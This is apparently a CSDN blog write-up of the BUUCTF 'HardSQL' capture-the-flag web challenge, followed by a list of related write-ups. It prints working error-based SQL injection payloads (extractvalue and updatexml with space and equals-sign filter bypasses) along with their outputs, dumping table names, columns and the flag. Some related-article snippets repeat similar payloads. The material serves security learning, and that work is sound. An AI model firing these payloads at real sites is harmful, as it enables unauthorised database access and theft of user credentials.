BUUCTF WEB [极客大挑战 2019]HardSQL

最新推荐文章于 2024-09-09 11:04:38 发布
最新推荐文章于 2024-09-09 11:04:38 发布
阅读量597 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124236785
版权
这篇博客详细记录了一次SQL注入攻击的过程,通过绕过过滤关键字,利用extractvalue函数进行信息爆破,逐步揭示了数据库的库名、表名、列名以及敏感数据。最终成功获取到flag,展示了数据库安全防护的重要性。
摘要由CSDN通过智能技术生成

BUUCTF WEB [极客大挑战 2019]HardSQL

万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入

  • 爆破库名
1'or(extractvalue(1,concat(1,database())))#

XPATH syntax error: 'geek'
  • 爆破表名
1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#

XPATH syntax error: 'H4rDsq1'
  • 爆破列名
1'or(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#

XPATH syntax error: 'id,username,password'
  • 爆破flag,这里需要注意,extractvalue的一次返回值最大为32位,当返回数据长度大于32时,需要结合其他函数使用
1'or(extractvalue(1,concat(1,(select(group_concat(password))from(H4rDsq1)where(id)like(1)))))#

XPATH syntax error: 'flag{71ea63c6-6be9-49c1-94d2-a79'
  • 爆破flag的后续数据
1'or(extractvalue(1,concat(1,(select(right(password,20))from(H4rDsq1)where(id)like(1)))))#

XPATH syntax error: 'd2-a79fdd930ca8}'
  • 得到flag
flag{71ea63c6-6be9-49c1-94d2-a79fdd930ca8}
Y1Daa
关注
专栏目录
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 258
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 759
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3107
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
[CTF夺旗赛] CTFshow Web1-12 详细过程保姆级教程~
最新发布
Da1NtY的博客
09-09 2076
​ CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
BUUCTFHardSQL[极客挑战 2019]
金 帛的博客
06-06 1419
buucft记录贴
BUUCTF WEB HardSql
qq_41696858的博客
10-13 262
这题考的是报错注入 判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合 下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm 关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723 基础payload: 账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了,所以需要空格来绕过 知道注入方
[极客挑战 2019]HardSQL
weixin_42513429的博客
04-14 764
[极客挑战 2019]HardSQL报错注入updatexml()报错注入extractvalue()报错注入 报错注入 updatexml()报错注入 打一个单引号,出现报错,再打一个单引号,发现没有报错了,所以考虑是单引号闭合,然后考虑and等关键字,发现拦截,考虑报错注入,空格也过滤了,考虑括号代替,表单提交的数据使用get方法转发到check.php,所以直接通过check.php ge...
BUUCTF---web---[极客挑战 2019]HardSQL
2201_75556700的博客
05-19 821
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
BUUCTF [极客挑战 2019]Http
weixin_53955759的博客
09-11 140
打开环境是一个小组的简介,看了一下 查看源码 找了半天才发现有Secrect.php这个可疑的地方,它藏在右边,一直没发现。 拼接地址进入 就提示我不是从https://www.Sycsecret.com这个地方进入的 那么第一个问题就是要解决如何欺骗它我们就是从https://www.Sycsecret.com进入的Secret.php 了解到有HTTP Referer伪造,这也是解决第一个问题需要用到的 下面就用到了bp拦截改referer 设置好代理,开启拦截.
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
[BUUCTF][极客挑战 2019]Http
朋克归零膏的博客
10-13 740
在CTF中修改http头的操作常有BUUCFT另一题,常用到的值User-AgentReferer。
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 903
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF:[极客挑战 2019]HardSQL
末初的CSDN博客
11-07 609
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
BUUCTF [极客挑战 2019]HardSQL
CrotZZ的博客
07-08 227
尝试万能密码被逮住 1’ or 1=1# 经过一系列尝试 order by,union select之类的都被过滤 网上别人的write参考了一下,这里是报错注入,用到xpath语法错误中extractvalue ^表异或,这里or and都被过滤了包括替换成&& ||我也试过也不行。 网上了解了下报错注入,这题目extractvalue里select后要加括号(比如下面database()外面加了括号),而正常情况下是不用的,猜测是空格被过滤的原因。 check.php?username
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 767
BUUCTF-Web】 [极客挑战 2019]PHP
buuctf-web-[极客挑战 2019]LoveSQL
weixin_46079186的博客
07-01 288
输入用户名admin’ 密码随便输 页面报错 尝试用万能用户名绕过 用户名输入:admin’or 1=1 # 密码随便输 登入成功 密码md5 解密一下没解出来,继续从登入框下手 admin’ order by 4 # 页面出错,说明3个列 输入admin’ union select 1,2,3 # 页面进入登入成功 6. 继续寻找回显点 1’union select 1,2,3 %23 // 这里用户名输什么都行就是不能输admin ,输adm..
BUUCTF----[极客挑战 2019]HardSQL
woshicainiao666的博客
03-09 567
报错注入updatexml()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值